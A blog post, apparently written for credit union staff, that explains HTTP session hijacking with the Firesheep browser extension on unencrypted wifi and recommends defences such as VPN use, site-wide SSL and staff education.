What do you suppose could happen if a person with malicious intent was able to gain access to the Facebook account of a credit union CEO? What about a corporate Twitter account? There has been an old hacking technique called HTTP Session Highjacking that has recently been brought to the front of the pack with the release of Firesheep by Eric Butler, and covered by TechCrunch.
When you sign in to an online service, such as your email, online banking, Facebook, or Flickr, the website gives your computer a session cookie. Generally, the login page is secured behind an SSL certificate, meaning that the traffic is encrypted and can’t be deciphered. However, as is the case with Facebook and Flickr, once you’ve logged into the service, you browse the site over regular HTTP that is not encrypted. Firesheep is an extension for Firefox that sniffs internet traffic on a network and finds cookies from websites like Facebook. Since these cookies aren’t encrypted and you are browsing Facebook without any security, these cookies can easily be copied and a person identity can be spoofed very easily. Firesheep makes this as easy as installing the plugin and click a button. It sits there and gathers all of the cookie traffic across a network and present you with the results, let you click on more button and logging into the Facebook account of someone.
Where Firesheep is incredibly scary is on unsecured wireless networks. Think Starbucks, McDonalds, and hotels. Now think about how many credit union employees use services like that when they travel. I’ve used an unencrypted wifi network every week this month where someone could have logged into my Facebook account, done whatever they wished, and I never would have been the wiser until a friend called me and asked if I really wanted $1000 wired to Western Union in the Netherlands.
Credit unions need to realize a few key things:
- With this issue, unencrypted wifi isn’t the devil. It is the websites that your users visit that don’t have end to end security (SSL).
- Your employees are going to use free wifi with the corporate assets, whether you like it or not.
- You need to have the tools in place to minize the risk of this happening to your CEO.
So how can credit unoions, their employees, and regular users prevent issues like this?
- Your credit union probably already has VPN access. Force your remote users to VPN back to the CU to go out the to internet. While traffic could still get intercepted once it leaves the credit union, it makes it much more challenging.
- Make 100% sure that all of the assets in online banking, including images and remote scripts, are all behind an SSL.
- Put your entire member facing website behind an SSL. An extended validation SSL is all the better.
- Avoid using unencrypted wifi access points at all costs.
- Educated your staff on the security issues with unencrypted wifi and the appropraite use of strong passwords.
Banning the use of wifi, Facebook, or whatever else isn’t the solution here. The best way to solve these issues is to educate your employees or users so they understand the ramifications of using insecure technology.